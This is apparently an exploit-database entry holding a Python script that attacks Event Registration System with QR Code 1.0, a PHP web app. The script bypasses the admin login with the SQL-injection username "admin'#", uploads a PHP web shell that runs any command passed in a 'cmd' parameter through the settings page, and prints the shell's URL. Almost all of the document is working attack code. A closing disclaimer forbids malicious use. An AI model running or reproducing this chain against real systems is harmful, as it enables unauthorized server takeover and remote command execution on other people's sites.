Event Registration System with QR Code 1.0 - Authentication Bypass & RCE

2021-07-28
ID: 104608
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro
 
import os, re, sys, argparse, requests
from termcolor import cprint

def banner():
    os.system("cls")
    print('''
    ___________                    __   
    \_   _____/__  __ ____   _____/  |_ 
     |    __)_\  \/ // __ \ /    \   __\\
     |        \\\\   /\  ___/|   |  \  |  
    /_______  / \_/  \___  >___|  /__|  
            \/           \/     \/ 
             Registration System
     --[Authentication Bypass and RCE]--
                @jjavierolmedo
    ''')   

def get_args():
    parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
    parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
    parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
    args = parser.parse_args()
    return args         

def auth_bypass(s, proxies, url):
    data = {
        "username":"admin'#",
        "password":""
    }

    r = s.post(url, data=data, proxies=proxies)

    if('{"status":"success"}' in r.text):
        cprint("[+] Authenticacion Bypass Success!\n", "green")
        return s
    else:
        cprint("[-] Authenticacion Bypass Error!\n", "red")
        sys.exit(0)
    
def upload_shell(s, proxies, url):
    content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
    file = {
        'img':('cmd.php',content)
    }

    data = {
        "name":"Event Registration System with QR Code - PHP",
        "short_name":"ERS-QR-PHP",
    }

    r = s.post(url, files=file, data=data, proxies=proxies)

    if('1' in r.text and r.status_code == 200):
        cprint("[+] Upload Shell Success!\n", "green")
        return s
    else:
        cprint("[-] Upload Shell Error!\n", "red")
        sys.exit(0)

def get_shell_url(s, proxies, url):
    r = s.get(url, proxies=proxies)
    regex = '\_cmd.php"> (.*?)</a></li>'
    shell_name = re.findall(regex, r.text)[0]
    url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
    cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")

def main():
    banner()
    args = get_args()
    target = args.target
    proxies = {'http':'','https':''}
    if args.proxy:
        proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}

    login_url = target + "/event/classes/Login.php?f=rlogin"
    upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
    shell_url = target + "/event/uploads/"

    s = requests.Session()
    s = auth_bypass(s, proxies, login_url)
    s = upload_shell(s, proxies, upload_url)
    s = get_shell_url(s, proxies, shell_url)
     
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        cprint("[-] User aborted session\n", "red")
        sys.exit(0)

# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
1-4-2 (www01)